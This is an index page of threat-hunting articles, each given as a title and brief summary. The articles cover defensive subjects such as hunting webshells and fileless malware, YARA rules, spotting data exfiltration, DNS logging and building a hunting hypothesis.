Threat Hunting Articles (23)

Introduction to Malware Endpoint hunting

In this article we will concentrate on locating malware endpoints.

Malware hunting: Detection tools

Malware will not disappear anytime soon. To remain undetected as long as possible, malware authors employ a variety of tools and methods. We also require a variety of tools and techniques to locate them.

Hunting Webshells: Tools

In this article we are going to discuss tools that can be use to discover Webshells.

Hunting Webshells: Linux and Windows Commands

Log analysis is one of the techniques used to hunt for web shells (Apache, IIS, etc.). We will not devote a great deal of time to analyzing web shell logs.

Intro to Hunting Webshells

A web shell is a script that can be uploaded to a web server to facilitate remote machine administration. Internal or Internet-facing web servers can be infected, and the web shell is used to pivot to internal hosts.

Suspicious Traffic Hunting

In this article, we will discuss how to identify normal network traffic when analyzing packets.

Fundamental threat hunting concepts and examples

Adversary behavioral identification is all about predicting attacks. It involves identifying the typical attack tactics or techniques used by an adversary to launch cyber attacks on a target network. It helps security experts in developing secure network infrastructure and adopting a variety of security techniques to prevent cyber attacks.

Analyzing malicious code without reverse engineering the assembly

When evaluating malicious code, there are various tools threat hunters can use to aid their investigation. One method to understand the behavior of suspicious files is to disassemble them. However, not everyone has the time or ability to learn assembly to comprehend a suspicious binary’s function. By using the Microsoft technical documentation site and knowing the malware’s capabilities, a threat hunter can make a more informed decision on the behavior of a suspicious file.

What is fileless malware?

Fileless malware is a type of malware that does not rely on traditional executable files to infect a system. Instead, fileless malware uses existing system files and resources to infect a system and carry out its malicious activity. Fileless malware typically uses scripting languages like PowerShell or VBScript to execute malicious code. The malware code is injected directly into system memory, evading detection by traditional security solutions that focus on scanning files on disk.

Using YARA for Threat Hunting in Enterprise Environments

Yara is a powerful application that allows forensic and malware analyst to search within artifacts discovered during an investigation. Yara allows for fine-grain searches based on offsets within an executable, timestamp, specific strings, and dozens of other criteria. Previous articles have discussed Yara and demonstrated some of its (see Introduction to Yara Part I and Introduction to Yara Part II). Threat hunters also use Yara to search for indicators of compromise (IOC) to help support their hypothesis. They are able to search for the IOCs using threat intelligence reports, malware analyst reports, or knowledge they have about a specific type of malware.

Detecting exfiltration over network protocols

Data exfiltration (exfil) is when data is transferred out of the organization without authorization. This can be done through a number of methods, including using protocols in an unintended way to inject data into the traffic stream. By understanding how protocols work and what data is supposed to exist in each field, a threat hunter can better identify threat actors who are trying to or have stolen sensitive information from an organization.

Fuzzy Hashing, Import Hashing and Section Hashing

In the last post looked at a variety of methods for tracking and recognizing malware samples, including hashes, fuzzy hashes, and even developing YARA rules. However, threat actors are constantly changing their signatures, making it difficult for us to recognize their approaches and tactics.

Introduction to YARA Rules - Part 2

Let’s continue our acquaintance with YARA rules!

Introduction to YARA Rules - Part 1

There has been a lot of research done over the years to increase detection skills, and researchers have managed to come up with a lot of novel detection methods and methodologies. Each one has its own set of advantages and disadvantages. As a result, we can’t claim that we’ll choose one over the other when it comes to detection. Some are better suited to one task but not to another. In many businesses, a hybrid solution will be implemented in this manner.

Hunting in distributed organizations

Threat hunting in a distributed organization can present some unique challenges. Those include gathering data from all applicable devices, having access to all devices relevant to the hunt being performed, and performing hunts relevant to the remote site - when applicable.

4 Approaches to threat hunt

Proactive monitoring of harmful activities on a company’s networks is known as threat hunting. It’s a crucial step in an organization’s security, more companies are starting to invest in it. Threat hunting’s goal is to find threats before they cause damage, which necessitates the employment of specific methodologies. Threat hunting is a time-consuming procedure, but it’s critical for any firm that wants to keep ahead of the cybersecurity curve.

Hunting with Threat Emulation

Organizations are under constant attack from sophisticated cyber adversaries. To defend against these threats, security teams must employ threat hunting techniques to identify and neutralize them. One such technique is threat emulation, which involves replicating an adversary’s behavior to understand their methods better, detect their behavior, and develop mitigating controls to block their attacks.

Email: Another source for data exfiltration

When a data exfiltration occurs, the cyber threat hunt may begin by examining public web servers, databases, and file servers. Those are obvious first choices due to their accessibility from the internet and within the organization. Knowing the type of data exfiltrated could provide clues on where to begin the hunt. That is, hoping the organization knows where all their data is located within the organization. Insights on the type of data leaked and where the data is stored within the organization could help generate a hypothesis to begin the threat hunt. Though another service to check is email.

Generating a threat hunting hypothesis

Threat hunting can be a daunting task. It can be difficult to know where to start, or what tools to use. One way to make the process easier is to generate a hypothesis before beginning your hunt. This will help you focus on specific areas, and make sure that you are looking for the right things.

The business case for threat hunting for small businesses

Threat hunting may seem like a process that only large organizations may need. Small businesses may feel they are not a target of cyberattacks so convincing them to invest in routine threat hunting processes may be difficult. According to the Small Business Administration, “88% of small business owners felt their business was vulnerable to a cyber-attack”. Hiscox insurance found that micro firms of less than ten employees “the median cost of all attacks this year [2021] was just over $8,000. But at the 95th percentile and beyond there were firms suffering losses of $308,000. Some encountered still worse outcomes. One German business services firm experienced breaches costing the equivalent of $474,000 per employee.” They also found some firms were attacked multiple times within a single year. Despite these statistics, small business owners continue to operate with the false sense of security that their business is too small to be a target.

Using DNS for Threat Hunting

DNS is a service that may provide valuable information on whether an organization has been compromised. In order for it to be used to aid in threat hunting, it must be configured to log the queries and the IP of the host performing the query. Once the logging is enabled, some questions can be asked which can be answered by using a SIEM or scripting.

Understanding the Threat Hunting Process Step-by-Step

Threat hunting is the process of detecting and responding to cyber intrusions that network and endpoint security controls have missed. It is also a proactive approach to security that can help organizations identify and mitigate risks before it results in an incident. The stages of threat hunting vary based on the sources you read, though there are 5 general stages that can be gleaned from existing literature.

Becoming a Threat Hunter

A rare diamond is on display at a local museum for few weeks. An efficient security system is in place to ensure the diamond does not get stolen. The system comprises alarms, cameras, and trained staff. In spite of the security system, the staff would always be vigilant for theft attempts on the diamond. This includes studying the behaviour of visitors coming in to see the diamond.